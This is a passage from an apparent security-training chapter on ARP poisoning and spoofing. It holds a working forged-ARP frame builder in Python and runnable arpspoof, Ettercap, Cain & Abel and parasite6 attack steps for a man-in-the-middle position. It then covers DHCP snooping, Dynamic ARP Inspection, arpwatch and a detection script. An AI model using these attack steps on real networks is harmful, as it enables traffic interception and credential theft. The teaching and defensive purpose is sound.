Make the script executable and run it. It now sends an ARP reply to the gateway and another to the victim every two seconds, so both ARP caches stay poisoned and all traffic between the two passes through the attacker's machine (a man-in-the-middle position):

root@bt:~# ./arp-poison.sh












file2cable - by FX <fx@phenoelit.de>
Thanx got to Lamont Granquist & fyodor for their hexdump()

(file2cable prints this banner on every call, so the loop above prints it twice per iteration.)
From this point on, a sniffer running on the attacker's machine captures everything the victim exchanges with the gateway; an FTP login, for example, is sent in clear text and can be read directly from the capture.
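The two frames edited by hand in the hex editor above can also be generated and checked programmatically. The following Python script is an added example and is not part of the original page or of file2cable; it builds the two ARP replies of the attack (attacker 00:15:58:27:69:7f, victim 192.168.2.111 / 00:14:85:24:2b:15, gateway 192.168.2.1 / 00:90:d0:23:d4:e6, as decoded from the screenshots), writes them as raw frame files in the form file2cable -f reads, and decodes them back so that a mistake in a field is caught before the frame goes on the wire. Only the standard library is used.

```python
"""Build, decode and dump the forged ARP replies used with file2cable above.
Added example (not from the original page); standard library only."""
import struct

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REPLY = 2               # ARP opcode: 1 = request, 2 = reply
ETH_MIN_FRAME = 60          # minimum Ethernet frame size without the FCS


def mac_bytes(mac: str) -> bytes:
    """Accept 00:15:58:27:69:7f or 00-15-58-27-69-7f and return the 6 raw bytes."""
    return bytes(int(octet, 16) for octet in mac.replace("-", ":").split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_reply(dst_mac, src_mac, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply.

    The receiver caches sender_ip -> sender_mac, so for poisoning sender_ip is the
    address to impersonate and sender_mac is the attacker's own MAC."""
    eth_header = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp_header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp_body = (mac_bytes(sender_mac) + ip_bytes(sender_ip)
                + mac_bytes(target_mac) + ip_bytes(target_ip))
    frame = eth_header + arp_header + arp_body              # 42 bytes
    return frame + b"\x00" * (ETH_MIN_FRAME - len(frame))   # zero padding, as in the dump


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame (e.g. read back from an arp-victim file)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an Ethernet/ARP frame")
    _htype, _ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (hlen, plen) != (6, 4):
        raise ValueError("unexpected address lengths")
    body = frame[22:42]
    return {
        "dst_mac": mac_str(frame[0:6]), "src_mac": mac_str(frame[6:12]),
        "opcode": opcode,
        "sender_mac": mac_str(body[0:6]), "sender_ip": ip_str(body[6:10]),
        "target_mac": mac_str(body[10:16]), "target_ip": ip_str(body[16:20]),
    }


def hexdump(data: bytes, width: int = 16) -> str:
    """Same layout as the hex editor screenshots: offset, hex bytes, printable ASCII."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02X}" for b in chunk).ljust(width * 3 - 1)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08X}  {hexpart}   {asc}")
    return "\n".join(lines)


# Addresses decoded from the screenshots above.
ATTACKER_MAC = "00:15:58:27:69:7f"
VICTIM_MAC, VICTIM_IP = "00:14:85:24:2b:15", "192.168.2.111"
GATEWAY_MAC, GATEWAY_IP = "00:90:d0:23:d4:e6", "192.168.2.1"


def forged_frames() -> dict:
    """The two frames the arp-poison.sh loop replays, keyed by file name."""
    return {
        # to the victim: "192.168.2.1 is at <attacker MAC>"
        "arp-victim": build_arp_reply(VICTIM_MAC, ATTACKER_MAC,
                                      ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        # to the gateway: "192.168.2.111 is at <attacker MAC>"
        "arp-gateway": build_arp_reply(GATEWAY_MAC, ATTACKER_MAC,
                                       ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    }


if __name__ == "__main__":
    for name, frame in forged_frames().items():
        with open(name, "wb") as fh:      # raw frame file, the input of file2cable -f
            fh.write(frame)
        print(name, parse_arp(frame))
        print(hexdump(frame))
```

Running the script writes arp-victim and arp-gateway into the current directory and prints the decoded fields next to a hex dump that should match the screenshots byte for byte (apart from the trailing bytes of the captured file). The same parse_arp() is also a quick way to inspect a frame file someone else prepared before replaying it.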

ARP Spoofing

ARP Poisoning With Cain & Abel

Source: http://www.oxid.it

Cain & Abel is a password recovery tool for Microsoft operating systems. It recovers many kinds of passwords by sniffing the network and by cracking the captured hashes, and it implements ARP Poison Routing (APR), which makes sniffing possible on switched LANs and enables man-in-the-middle attacks. Its sniffer can also analyse encrypted protocols such as SSH-1 and HTTPS, and contains filters that capture credentials from a wide range of authentication mechanisms.



Start the program (the first run offers a configuration wizard); the main window opens on the Decoders tab:







[Screenshot: Cain & Abel main window. Menu: File, View, Configure, Tools, Help. Tabs: Decoders, Network, Sniffer, Cracker, Traceroute, CCDU, Wireless, Query. The Decoders tab lists Cached Passwords: Protected Storage, LSA Secrets, Wireless Passwords, IE 7/8/9 Passwords, Windows Mail Passwords, Dialup Passwords, Edit Boxes, Enterprise Manager, Credential Manager, Windows Vault. Status bar: "Press the + button on the toolbar to dump the Protected Storage". http://www.oxid.it]



To choose the network adapter on which to sniff, open Configure from the menu and select the adapter. Then start the sniffer with the Start/Stop Sniffer button on the toolbar, open the Sniffer tab and press + to scan the LAN for hosts:





[Screenshot: Sniffer tab, Hosts list after scanning the LAN. Columns: IP address, MAC address, OUI fingerprint, Host name. Hosts found: 192.168.1.1, MAC C04A00C6A0C0, TP-LINK TECHNOLOGIES; 192.168.1.100, MAC 0013F75C33A7, SMC Networks, Inc. Bottom tabs: Hosts, APR, Routing, Passwords, VoIP. Status bar: Lost packets: 0%.]



Then open the APR tab at the bottom of the window, click in the upper list and press the + button on the toolbar to add a poisoning route, as in the following figure:

[Screenshot: APR tab. Upper list columns: Status, IP address, MAC address, Packets ->, <- Packets, MAC address, IP address; a "Proxy HTTPS (0)" entry on the left. Lower list with the same columns, tabs Configuration / Routed Packets. Bottom tabs: Hosts, APR, Routing, Passwords, VoIP. Lost packets: 0%.]



In the dialog that opens after pressing +, choose the gateway's IP address in the left list and the victim's IP address in the right list to add the ARP poisoning route. Then press the START/STOP APR button (the radioactive icon on the toolbar): the status column of the route changes to show that poisoning is active, and the victim's traffic to and from the gateway now passes through the attacker's machine.

ARP Poisoning Tool: WinArpAttacker

http://www.xfocus.net

WinArpAttacker scans, detects and attacks hosts on a LAN. It scans the network for live hosts, lists their IP and MAC addresses and host names, and can launch ARP attacks against them, among them ARP flooding and sending IP conflict packets, which cut the target off the network.



[Screenshot: WinArpAttacker main window. Menu: Scan, Attack, Detect, Options, View, Help. Host list columns: IP Address, Mac Address, Hostname, Online, Sniffing, Attack, ArpSQ, ArpSP, ArpRQ, ArpRP, Packets; hosts 10.0.0.1 to 10.0.0.5 listed as Online, with Sniffing and Attack status Normal. Event log columns: Event, ActHost, EffectHost, Effect; entries New_Host and Local_Arp_Entry dated 2012-08-28. Status bar: Ready; 10.0.0.5 Mac: 00-15-5D-...]



ARP Poisoning Tool: Ufasoft Snif

http://ufasoft.com

Ufasoft Snif is a network sniffer that uses ARP poisoning to capture traffic on switched networks as well as on shared ones. The same vendor ships protocol-specific sniffers for ICQ/IRC/MSN/email (for example IcqSnif and IcqDump, which capture and decode instant-messaging sessions on the network); all of them are built on the Ufasoft Sniffer engine, which can also be licensed separately.



[Screenshot: Ufasoft Packet Snif result window: a list of captured packets on the left, the decoded fields and a hex view of the selected packet on the right. http://ufasoft.com]



ARP Poisoning Tool: arpspoof

arpspoof is one of the tools in the dsniff suite. It redirects packets from a target host (or from every host) on the LAN that are intended for another host by sending forged ARP replies. Because ARP is stateless, the target accepts the unsolicited replies and updates its ARP cache.

Before using arpspoof, enable IP forwarding on the attacker's machine, so that the redirected traffic is still delivered to its real destination and the victim keeps working. As root:

#echo 1 > /proc/sys/net/ipv4/ip_forward

Running arpspoof without arguments prints its usage and the options it accepts:

#arpspoof

The following example shows the tool in action. The three machines in the test network, inferred from the ARP caches shown below:

Gateway:
  MAC address: 00-50-56-C0-00-08
  IP address: 192.168.65.1
  Subnet mask: 255.255.255.0

Victim:
  MAC address: 00-0C-29-35-C9-CD
  IP address: 192.168.65.129
  Subnet mask: 255.255.255.0

Attacker:
  MAC address: 00:0c:29:09:22:31
  IP address: 192.168.65.130
  Subnet mask: 255.255.255.0

The victim's ARP cache before the attack (arp -a on the victim):

Interface: 192.168.65.129 --- 0x30002
  Internet Address      Physical Address      Type
  192.168.65.1          00-50-56-c0-00-08     dynamic

To impersonate the gateway towards the victim, run on the attacker (-t selects the target whose cache is poisoned; the last argument is the host to impersonate):

#arpspoof -t 192.168.65.129 192.168.65.1

Now generate some traffic from the victim to the gateway (for example, ping the gateway). The victim's ARP cache then reads:

Interface: 192.168.65.129 --- 0x30002
  Internet Address      Physical Address      Type
  192.168.65.1          00-0c-29-09-22-31     dynamic

Note that the MAC address recorded for 192.168.65.1 has changed from 00-50-56-c0-00-08 to 00-0c-29-09-22-31, which is the attacker's MAC: every packet the victim sends to its gateway now goes to the attacker. To poison the other direction as well, run a second arpspoof with the gateway as the target and the victim as the host to impersonate.



Other ARP Poisoning Tools for Linux

Arpoison

Source: http://www.arpoison.net

Arpoison is a command-line tool that builds a single ARP reply with user-specified source and destination IP and MAC addresses and sends it. Because ARP is stateless, a host that receives the reply updates its cache with whatever mapping the reply carries. It does the same job as arpspoof from dsniff, but exposes every field of the reply on the command line:

#arpoison -i <device> -d <dest IP> -s <src IP> -t <target MAC> -r <src MAC>

Subterfuge

https://code.google.com/p/subterfuge/downloads/list

Subterfuge is a network security framework (Network Security Framework) built to perform man-in-the-middle attacks through a simple web interface. It uses ARP poisoning to put itself between the hosts and harvests the credentials passing through, and it also supports client-side browser injection and session hijacking. Start it from a terminal with the subterfuge command and press Enter:

[Screenshot: Terminal - root@ubuntu: ~ with Subterfuge starting.]

Then open a browser, go to http://127.0.0.1:80 and press Enter to reach the web interface.

[Screenshot: Subterfuge web interface with the modules Credential Harvester, HTTP Code Injection, Session Hijack, Network Update and Exploitation. The HTTP Code Injection page reads: "Subterfuge's HTTP Code Injection Module allows a user to inject payloads directly into a target's browsing session. Payloads can be anything from simple javascript/HTML injections to browser exploits. You can even write your own injects." Running: ie/ms10_02_aurora; Vector: (empty); Payload: meterpreter/reverse_tcp.]

The modules available in Subterfuge include:

ARP Cache Poisoning
Credential Harvester
Http Code Injection
Wireless AP Generation
WPAD Hijacking
Rogue DHCP

Ettercap

Source: http://ettercap.github.io/ettercap

Ettercap is a suite for man-in-the-middle attacks on a LAN, written by Alberto Ornaghi (ALoR) and Marco Valleri (NaGA). It supports active and passive dissection of many protocols, including encrypted ones, and contains many features for network and host analysis. It poisons the ARP caches of the selected hosts and, once in the middle, can:

- Modify the data in live connections (Modify data connections)
- Collect passwords for protocols such as FTP, HTTP, POP and SSH1
- Forge SSL certificates in order to intercept HTTPS sessions

ARP poisoning works because ARP has no authentication: when a host receives a reply that maps an IP address to a MAC address it simply accepts it, so the attacker can send replies that map the gateway's IP address to his own MAC. This is what is called ARP poisoning or ARP spoofing, and it only works when the attacker and the victims are on the same broadcast domain (the same LAN).

Ettercap has three user interfaces: text mode, curses mode and a GTK graphical interface.

Starting Ettercap in Kali: Applications > Sniffing/Spoofing > Network Sniffers and select ettercap-graphical. From the terminal, start the graphical (GTK) interface with:

#ettercap -G

Start it in text mode with:

#ettercap -T

And in curses mode with:

#ettercap -C

Seringe

Source: http://www.securiteam.com/tools/5QP0I2AC0L.html

Seringe is a statically compiled ARP poisoning tool. It sends forged ARP replies and requests to the hosts of the attacker's choice, which redirects their traffic on a switched network to the attacker's machine, where it can then be examined with the usual "sniffers".

parasite6

parasite6 (part of the THC-IPv6 toolkit) is the IPv6 counterpart of ARP spoofing. IPv6 resolves neighbours with Neighbor Solicitation/Advertisement messages instead of ARP; parasite6 answers every Neighbor Solicitation seen on the link with an advertisement carrying the attacker's (or a fake) MAC address, so that all traffic between the hosts flows through the attacker. If the MAC supplied does not exist, the result is a DoS of the link.

Usage:

#parasite6 [-lRFHD] <interface> [fake-mac]

Option -l loops and resends the packets per target every 5 seconds
Option -R will also try to inject the destination of the solicitation
Options NS security bypass: -F fragment, -H hop-by-hop and -D large destination header

Other ARP poisoning tools: ARP-FILLUP, arp-sk, ARPOc, arpalert, arping, arpmitm, arpoison, ArpSpyX, ArpToXin, SwitchSniffer, Simsang.

How To Defend Against ARP Poisoning

ARP poisoning can be mitigated with Dynamic ARP Inspection (DAI), a security feature of managed switches that validates the ARP packets in the network. DAI intercepts, logs and discards ARP packets that carry an invalid IP-to-MAC address binding, and it does so per VLAN: in every VLAN where it is enabled, all ARP requests and replies arriving on untrusted ports are inspected before they are forwarded.

The source of truth for the inspection is the DHCP snooping binding table, which the switch builds by watching DHCP traffic; DHCP snooping must therefore be enabled before DAI, and on the same VLANs. For each ARP packet from an untrusted port, DAI compares the sender IP and MAC addresses in the packet with the binding recorded for that port and VLAN. If they match, the packet is forwarded; if there is no matching entry, the packet is dropped and the event is logged. An attacker who claims the gateway's IP address with his own MAC therefore cannot get his replies past the switch. Ports facing other switches, or servers with static addresses, are configured as trusted and are not inspected.


[Figure: Implement Dynamic ARP Inspection Using DHCP Snooping Binding Table. A switch with "DHCP Snooping Enabled" and "Dynamic ARP Inspection Enabled" holds a binding table (columns IP Address, MAC Address, Lease, Type, VLAN, Interface) with 10.10.10.1 = MAC A and 10.10.10.2 = MAC B. The attacker (10.10.10.5, MAC C) sends "ARP to 10.10.10.2 saying 10.10.10.1 is MAC C" and "ARP to 10.10.10.1 saying 10.10.10.2 is MAC C". The switch checks the MAC and IP fields to see if the ARP from the interface is in the binding; there is no such entry in the binding table, so the packets are discarded and the traffic is blocked.]

Configuring DHCP Snooping and Dynamic ARP Inspection on a Cisco switch

Because DAI relies on the DHCP snooping binding table, DHCP snooping must be configured first. With DHCP snooping the switch acts like a firewall between untrusted hosts and the DHCP server: it drops DHCP server messages arriving on untrusted ports, and it builds and maintains the DHCP snooping binding database, which records for every client that obtained an address through DHCP its IP address, MAC address, lease time, VLAN and switch port (port mapping).

DHCP snooping is enabled globally and then on the VLANs to protect. Its status is shown with show ip dhcp snooping:

Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan 10
Switch(config)# ^Z
Switch# show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs: 10
DHCP snooping is operational on following VLANs: 10
DHCP snooping is configured on the following L3 Interfaces:

DHCP snooping trust/rate is configured on the following Interfaces:

Interface                  Trusted    Rate limit (pps)


If the DHCP server is reached through a particular switch port (or through an uplink to another switch), that port must be marked as trusted with the interface command ip dhcp snooping trust, since DHCP responses arriving on untrusted ports are dropped. As clients obtain leases, the DHCP snooping binding table fills with their IP addresses, MAC addresses, VLANs and ports. Display it with:

Switch# show ip dhcp snooping binding

Each row of the binding table ties a MAC address to the IP address it was leased, together with the lease time, the VLAN and the port on which the client was seen. In the lab the table contained one binding:

Switch# show ip dhcp snooping binding
[one binding row; the entry is not legible in the screenshot]
Total number of bindings: 1

Once the DHCP snooping binding table is populated, enable dynamic ARP inspection (DAI). DAI is enabled per VLAN, and its configuration and counters are shown with show ip arp inspection (no ARP packet has been inspected yet, so all counters are zero):

Switch(config)# ip arp inspection vlan 10
Switch(config)# ^Z

Switch# show ip arp inspection

Source Mac Validation      : Disabled
Destination Mac Validation : Disabled
IP Address Validation      : Disabled

 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
   10     Enabled          Active

 Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------
   10     Deny             Deny              Off

 Vlan      Forwarded        Dropped     DHCP Drops     ACL Drops
 ----      ---------        -------     ----------     ---------
   10              0              0              0             0

 Vlan   DHCP Permits   ACL Permits   Probe Permits   Source MAC Failures
 ----   ------------   -----------   -------------   -------------------
   10              0             0               0                     0

 Vlan   Dest MAC Failures   IP Validation Failures   Invalid Protocol Data
 ----   -----------------   ----------------------   ---------------------
   10                   0                        0                       0



Note: the command ip arp inspection validate {src-mac | dst-mac | ip} adds further checks on each ARP packet beyond the binding-table lookup: src-mac compares the source MAC in the Ethernet header with the sender MAC in the ARP body, dst-mac compares the destination MAC with the target MAC in replies, and ip checks the IP addresses in the ARP body for invalid or unexpected values. These checks are the three lines shown as Disabled in the output above; enable the ones you need.

Example: an attacker on FastEthernet0/5 in VLAN 10 claims the IP address 192.168.10.1 (the gateway) by sending ARP replies, trying to place himself between the hosts and the router. Dynamic ARP inspection compares the reply with the DHCP snooping binding table, finds no entry that binds 192.168.10.1 to the attacker's MAC on FastEthernet0/5, drops the packet and logs:

%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Fa0/5, vlan 10.
([0013.6050.acf4/192.168.10.1/ffff.ffff.ffff/192.168.10.1/05:37:31 UTC Mon Mar 1 2012])

Every dropped packet also increments the drop counters (drop count) of the VLAN. The Dropped and DHCP Drops columns of show ip arp inspection therefore show the effect of dynamic ARP inspection:



Switch# show ip arp inspection

Source Mac Validation      : Disabled
Destination Mac Validation : Disabled
IP Address Validation      : Disabled

 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
   10     Enabled          Active

 Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------
   10     Deny             Deny              Off

 Vlan      Forwarded        Dropped     DHCP Drops     ACL Drops
 ----      ---------        -------     ----------     ---------
   10             30              5              5             0

 Vlan   DHCP Permits   ACL Permits   Probe Permits   Source MAC Failures
 ----   ------------   -----------   -------------   -------------------
   10             30             0               0                     0

 Vlan   Dest MAC Failures   IP Validation Failures   Invalid Protocol Data
 ----   -----------------   ----------------------   ---------------------
   10                   0                        0                       0



Static ARP Entries

A static ARP entry fixes the IP-to-MAC mapping in the ARP cache, so that it is no longer updated by incoming ARP replies. Static entries make ARP poisoning considerably harder on a small network, but every host must be updated by hand whenever an IP/MAC pair on the network changes, which does not scale beyond a few machines and is impractical on large networks. An entry is added with:

#arp -s ip_address mac_address

after which arp -a shows the entry as static:

C:\>arp -a

Interface: 192.168.1.137 --- 0x60005
  Internet Address      Physical Address      Type
  192.168.1.30          20-cf-30-3a-f7-c9     static
  192.168.1.254         00-1d-7e-f8-23-d6     dynamic

(On Windows Vista and later, arp -s entries may not survive an interface reset; the equivalent persistent command is netsh interface ipv4 add neighbors "<interface name>" <ip_address> <mac_address>.)

OS Security

The operating system itself can be hardened so that it does not accept unsolicited ARP replies (replies that do not answer a request it sent) and so that cache entries are only replaced when their timeout expires. On Windows the ARP behaviour is tuned through the registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, with the values ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute and ArpRetryCount.

AntiARP provides Windows-based spoofing prevention.

ArpStar is a module for Linux kernel 2.6 and for Linksys routers that drops packets which violate the known IP-to-MAC mapping, and offers an option to repoison/heal the affected hosts.



ARP Spoofing Detection Software

ARP spoofing is detected by inspecting the ARP replies seen on the network. One approach is to cross-check each reply against another source of truth, such as the leases held by the DHCP server or a list of the known IP/MAC pairs of the hosts on the subnet, and to flag replies whose MAC address does not match. Most detection tools work passively: they listen to the ARP traffic, record the IP-to-MAC mappings they learn, and raise an alert when a mapping changes or when one MAC address starts answering for several IP addresses.

XArp

http://www.chrismc.de

XArp performs advanced ARP spoofing detection. It uses two kinds of techniques: inspection modules, which examine each ARP packet and compare it with XArp's database of known mappings, and discoverers, which actively query the network to validate the current IP-MAC mappings. It keeps a database of IP-to-MAC mappings and alerts the user when one of them changes, which makes it usable for finding unauthorized hosts that run ARP attacks on the network.

[Screenshot: XArp main window: the list of monitored hosts with their IP addresses, MAC addresses and interface, and a security alert for a changed mapping.]
DefendARP

http://www.arppoisoning.com/defense-scripts

DefendARP is a host-based ARP table monitoring and defence tool, written for use when connecting to public Wi-Fi. It detects ARP poisoning attacks, corrects the poisoned entry and identifies the MAC and IP address of the attacker. It first removes the entry for the defended IP from the ARP table and learns the correct MAC for it, then watches the table; if the MAC recorded for that IP changes, it reports the attacker's MAC address and resets the entry to the correct one.

Save this batch script as defendarp.bat and run it with defendarp.bat <IP Addr to defend>:

C:\Users\Alan\Desktop>defendARP.bat 10.10.13.1
INITIALIZING

Removing 10.10.13.1 from ARP table.
OK.

Obtaining MAC address
OK.

Is 00-18-F8-3b-61-F5 the correct MAC for 10.10.13.1 <y/n>?y
OK.

Monitoring your ARP table...

ARP POISONED

Spoofed IP: 10.10.13.1
10.10.13.1's actual Physical Address: 00-18-F8-3b-61-F5
Attcker's Physical Address: 00-0c-29-28-4e-36
Attempting to reset the correct Physical Address...
ARP Table reset.

Monitoring your ARP table...

anti-arpspoof

arpwatch

http://ee.lbl.gov

arpwatch monitors Ethernet activity and keeps a database of IP-to-MAC address pairings. It reports changes, for example a "changed ethernet address" message when an IP address suddenly maps to a different MAC, by email and through syslog, which makes it a simple way to detect ARP spoofing on a segment. It runs on Linux and BSD. Start it on an interface and watch the log:

#arpwatch -i eth0

#tail -f /var/log/messages

The options it is started with are set in its configuration file (the OPTIONS line):

# -u <username> : defines with what user id arpwatch should run
# -e <email>    : the <email> where to send the reports
# -s <from>     : the <from>-address
OPTIONS="-u arpwatch -e tecmint@tecmint.com -s 'root (Arpwatch)'"
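The passive detection logic that arpwatch, XArp and DefendARP implement, run here over constructed ARP replies instead of a live interface. This Python script is an added example and is not part of the original page or of any of those tools: it keeps the learned IP-to-MAC table, raises "changed ethernet address" when an IP suddenly resolves to a new MAC, "flip flop" when the IP keeps switching between two MACs (the real host and the attacker both answering), and "duplicate" when one MAC claims the gateway and another address at the same time, which is exactly the pattern of the poisoned arp -a output earlier in this chapter. The replies are constructed to mirror the file2cable attack (gateway 192.168.2.1, attacker 192.168.2.102, victim 192.168.2.111); a second function applies the duplicate check to the text of an arp -a listing.

```python
"""Passive ARP spoofing detection over ARP replies and over arp -a output.
Added example (not from the original page); standard library only."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    time: float            # capture timestamp in seconds
    sender_ip: str
    sender_mac: str


class ArpSpoofDetector:
    def __init__(self, known=None, gateway_ip=None):
        # known: optional IP -> MAC pairs from the DHCP server or a host inventory
        self.table = {ip: mac.lower() for ip, mac in (known or {}).items()}
        self.previous = defaultdict(set)   # ip -> MACs it was seen with earlier
        self.gateway_ip = gateway_ip
        self.alerts = []                   # (kind, subject, detail, time)

    def _ips_for(self, mac):
        return sorted(ip for ip, m in self.table.items() if m == mac)

    def observe(self, reply: ArpReply) -> list:
        """Feed one ARP reply; returns the alerts this reply produced."""
        mac, ip = reply.sender_mac.lower(), reply.sender_ip
        new = []
        old = self.table.get(ip)
        if old is None:
            new.append(("new station", ip, mac, reply.time))
        elif old != mac:
            # an IP that suddenly answers from another MAC: the poisoning symptom
            kind = "flip flop" if mac in self.previous[ip] else "changed ethernet address"
            new.append((kind, ip, f"{old} -> {mac}", reply.time))
            self.previous[ip].add(old)
        self.table[ip] = mac
        # one MAC now claiming the gateway plus another address: attacker in the middle
        claimed = self._ips_for(mac)
        if self.gateway_ip in claimed and len(claimed) > 1:
            new.append(("duplicate", ",".join(claimed), mac, reply.time))
        self.alerts.extend(new)
        return new


def shared_macs_in_arp_a(output: str) -> dict:
    """Quick check on Windows 'arp -a' output: MACs that appear for more than one IP."""
    by_mac = defaultdict(list)
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].count(".") == 3 and parts[2] in ("dynamic", "static"):
            by_mac[parts[1].lower().replace("-", ":")].append(parts[0])
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed capture mirroring the file2cable attack shown earlier.
CAPTURE = [
    ArpReply(0.0, "192.168.2.1",   "00:90:d0:23:d4:e6"),   # real gateway
    ArpReply(0.5, "192.168.2.102", "00:15:58:27:69:7f"),   # attacker's own address
    ArpReply(1.0, "192.168.2.111", "00:14:85:24:2b:15"),   # victim
    ArpReply(5.0, "192.168.2.1",   "00:15:58:27:69:7f"),   # forged: gateway "moved" to attacker
    ArpReply(9.0, "192.168.2.1",   "00:90:d0:23:d4:e6"),   # real gateway answers again
]

# Constructed arp -a listing in the poisoned state.
POISONED_ARP_A = """Interface: 192.168.2.111 --- 0x10005
  Internet Address      Physical Address      Type
  192.168.2.1           00-15-58-27-69-7f     dynamic
  192.168.2.102         00-15-58-27-69-7f     dynamic
"""


def run_demo():
    det = ArpSpoofDetector(gateway_ip="192.168.2.1")
    for reply in CAPTURE:
        det.observe(reply)
    return det.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
    print(shared_macs_in_arp_a(POISONED_ARP_A))
```

The "new station" alerts are noise on a fresh start; arpwatch quietens them by persisting its database between runs, and the known= argument serves the same purpose here. The check worth acting on is a "changed ethernet address" or "duplicate" for the gateway, since that is the address an attacker impersonates to get into the path of every host.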
ArpON

ArpON (ARP handler inspection) is a portable handler daemon that makes the ARP protocol secure in order to avoid:

- ARP Spoofing
- cache poisoning or poison routing attacks in static, dynamic and hybrid networks

Other

Antidote, Arp_Antidote, Arpalert, Arpwatch/ArpwatchNG/Winarpwatch, Prelude IDS, Snort



Comparison of ARP spoofing defence tools:

Name                     | OS                        | GUI | Free               | Protection       | Per interface | Active/passive
-------------------------|---------------------------|-----|--------------------|------------------|---------------|---------------------------------------------------------
Agnitum Outpost Firewall | Windows                   | Yes | No                 | Yes              | No            | passive
AntiARP                  | Windows                   | Yes | No                 | Yes              |               | active+passive
Antidote                 | Linux                     | No  | Yes                | No               | ?             | passive
Arp_Antidote             | Linux                     | No  | Yes                | No               | ?             | passive
Arpalert                 | Linux                     | No  | Yes                | No               | Yes           | passive
ArpON                    | Linux/Mac/BSD             | No  | Yes                | Yes              | Yes           | active+passive
ArpGuard                 | Mac                       | Yes | No                 | Yes              | Yes           | active+passive
ArpStar                  | Linux                     | No  | Yes                | Yes              | ?             | passive
Arpwatch                 | Linux                     | No  | Yes                | No               | Yes           | passive
ArpwatchNG               | Linux                     | No  | Yes                | No               | No            | passive
Colasoft Capsa           | Windows                   | Yes | No                 | No               | Yes           | no detection, only analysis with manual inspection
Prelude IDS              | ?                         | ?   | ?                  | ?                | ?             | ?
remarp                   | Linux                     | No  | Yes                |                  |               | passive
Snort                    | Windows/Linux             | No  | Yes                | No               | Yes           | passive
Winarpwatch              | Windows                   | No  | Yes                | No               | No            | passive
XArp                     | Windows, Linux            | Yes | Yes (+pro version) | Yes (Linux, pro) | Yes           | active + passive
Seconfig XP              | Windows 2000/XP/2003 only | Yes | Yes                | Yes              | No            | only activates protection built-in some versions of Windows


8.5 Spoofing Attack

So far this chapter has covered sniffing, MAC flooding, DHCP attacks and ARP poisoning. This section looks at spoofing attacks, in which the attacker takes on the identity of another host on the network in order to intercept its traffic: MAC spoofing/duplicating and IRDP spoofing. The techniques for MAC spoofing are shown afterwards.

Spoofing Attack Threats

Spoofing means impersonating another host or device. MAC spoofing and IRDP spoofing are two spoofing attacks that target the data link and the routing information of the hosts on a LAN.

MAC Spoofing

Intrusion detection systems and access controls such as the MAC filtering of switches and wireless access points decide on the basis of the MAC address whether a host is allowed on the network. A MAC spoofing attack changes the attacker's MAC address to one that belongs to an authorized host, so that such filters let the attacker in. The attacker first sniffs the network for the MAC addresses of the clients that are legitimately connected, then assumes one of those addresses and accesses the network with the identity of that client.

IRDP Spoofing

The ICMP Router Discovery Protocol (IRDP) is a routing protocol, carried in ICMP, that lets a host discover the IP addresses of the active routers on its subnet by listening for router advertisement messages (and by soliciting them). An attacker can send spoofed IRDP router advertisement messages to the hosts on the subnet, which then change their default router (their routing table) to whatever the attacker chooses. Because IRDP requires no authentication, the target host prefers the default route announced by the attacker over the one it received from the DHCP server. This attack enables sniffing of the redirected traffic, man-in-the-middle attacks and denial of service.

MAC Spoofing/Duplicating

The Media Access Control address (MAC address) identifies a network interface on the data link layer. A MAC duplicating attack is launched by sniffing the network for the MAC addresses of clients that are actively associated with a switch port and re-using one of those addresses. By listening to the traffic on the network, a malicious user can take a legitimate user's MAC address and receive all the traffic destined for that user. This lets the attacker gain access to the network and take over the identity of someone who is already on it.

The following figure shows the MAC spoofing/duplicating attack:

[Figure: the legitimate user announces "My MAC address is A:B:C:D:E"; the switch port is configured to allow access to the network only if the MAC address is A:B:C:D:E. The attacker sniffs the network for the MAC addresses of the currently associated users and then uses that MAC address to attack other users connected to the same switch port. Note: this technique works on wireless access points with MAC filtering enabled.]

Figure: MAC spoofing/duplicating attack; the same technique works on wireless access points that use MAC filtering.



MAC Spoofing Technique: Windows (in Windows 8 OS)

MAC spoofing changes the MAC address that the network adapter presents on the network, for example to the address of an authorized machine. This does not alter the address burned into the hardware; it only changes the address the driver uses, which is why the operation is often called "cloning" a MAC address (clone MAC addresses). On Windows it can be done in two ways: through the adapter's driver properties, if the driver supports it, or through the registry.

Method 1: through the adapter properties. This works only when the NIC driver exposes the option (cloning MAC address):

Settings > Control Panel > Networking and Sharing Center.
Open the Ethernet connection and click Properties in the Ethernet Status window.
In the Ethernet Properties window click Configure, then open the Advanced tab.
